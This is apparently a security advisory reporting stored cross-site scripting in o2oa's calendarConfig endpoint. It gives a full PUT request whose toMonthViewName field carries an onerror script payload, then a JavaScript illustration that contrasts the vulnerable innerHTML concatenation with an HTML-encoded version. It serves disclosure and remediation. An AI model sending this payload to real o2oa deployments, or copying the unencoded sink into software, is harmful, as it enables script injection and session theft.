
Stored XSS in /x_organization_assemble_personal/jaxrs/definition/calendarConfig in o2oa ≤ 10.0-410-g3d5e0d2 #170

@ez-lbz

Description

Summary

In o2oa versions up to 10.0-410-g3d5e0d2, the /x_organization_assemble_personal/jaxrs/definition/calendarConfig endpoint is vulnerable to stored cross-site scripting (XSS). An authenticated user can inject arbitrary JavaScript by setting the toMonthViewName field of the calendar configuration; the value is stored server-side and later rendered into the calendar page without output encoding, so the injected markup is parsed as HTML and the script executes.

Exploitation

Send a crafted PUT request to /x_organization_assemble_personal/jaxrs/definition/calendarConfig with the payload in the toMonthViewName field. The request must carry a valid session (the x-token cookie and Authorization header below are from the reporter's local test instance); the payload opens with `">` to break out of an attribute context before the `<img>` element is injected.

PUT /x_organization_assemble_personal/jaxrs/definition/calendarConfig?v=develop-10.0-410-3d5e0d2 HTTP/1.1
Host: localhost
Cookie: x-token=Wrr7kmtfAdHix4JgERWhu-K6ZlusjUyzvPAekU6E6zc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br, zstd
Authorization: Wrr7kmtfAdHix4JgERWhu-K6ZlusjUyzvPAekU6E6zc
Sec-Fetch-Site: same-origin
Referer: http://localhost/x_desktop/index.html
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Content-Type: application/json; charset=UTF-8
Accept-Language: zh-CN
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Accept: text/html,application/json,*/*
Origin: http://localhost
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Content-Length: 154

{"weekBegin":"0","disableViewList":[],"toMonthViewName":"\"><img src=1 onerror=alert('hacker')>","toWeekViewName":"","toDayViewName":"","toListViewName":""}

When the calendar view that renders toMonthViewName is next opened, the stored payload is parsed as HTML and the onerror handler fires (alert('hacker')), confirming the stored XSS.
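The following is an added illustration, not o2oa's own code: a minimal model of how a stored calendarConfig value reaches the page, with the vulnerable sink beside a hardened one. The rendering functions, their markup and the helper names are assumed for the illustration; only the JSON body is taken from the request above.

```javascript
// Added illustration, not o2oa's code. The rendering functions below are
// assumed shapes; only the calendarConfig body comes from the report.

// Constructed sample: the calendarConfig body from the PUT request above,
// as the server would hand it back to the client on the next page load.
const storedCalendarConfig = {
  weekBegin: "0",
  disableViewList: [],
  toMonthViewName: "\"><img src=1 onerror=alert('hacker')>",
  toWeekViewName: "",
  toDayViewName: "",
  toListViewName: "",
};

// HTML-encode the five characters that matter in attribute and text context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable sink (assumed shape): the user-controlled label is concatenated
// straight into markup that is later assigned to innerHTML. The leading `">`
// in the payload closes the title attribute, and the <img> then parses as a
// real element whose onerror handler runs.
function renderViewButtonVulnerable(cfg) {
  const label = cfg.toMonthViewName;
  return '<div class="view" title="' + label + '">' + label + "</div>";
}

// Hardened sink: encode every user-controlled value before it lands in
// either an attribute or a text node. The browser shows the literal
// characters and creates no element.
function renderViewButtonSafe(cfg) {
  const label = escapeHtml(cfg.toMonthViewName);
  return '<div class="view" title="' + label + '">' + label + "</div>";
}

// Crude sink check: does anything after the <div ...> wrapper's first '>'
// still start a tag? In the vulnerable output the first '>' is the one the
// payload injected, so the <img> follows it; in the safe output only the
// encoded text and the closing </div> remain.
function containsInjectedTag(html) {
  const inner = html.slice(html.indexOf(">") + 1);
  return /<[a-z]/i.test(inner);
}

// Defence in depth on the write path (server side in the real project):
// a calendar view label has no business containing markup characters.
// This does not replace output encoding; it only limits what gets stored.
function isPlainLabel(name, maxLen = 64) {
  return typeof name === "string" && name.length <= maxLen && !/[<>"'&]/.test(name);
}

console.log("vulnerable:", renderViewButtonVulnerable(storedCalendarConfig));
console.log("hardened:  ", renderViewButtonSafe(storedCalendarConfig));
```

The fix that matters is the one in renderViewButtonSafe: encode at the point where the value is placed into HTML (or assign it via textContent instead of innerHTML). The isPlainLabel check is a second layer for the PUT handler, not a substitute, because the same stored value may be rendered by more than one client path.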


Impact

  • Persistent execution of attacker-controlled JavaScript in the victim’s browser

  • Theft of session tokens, user credentials, or other sensitive data

  • Ability to perform actions on behalf of victims, leading to account compromise and privilege escalation
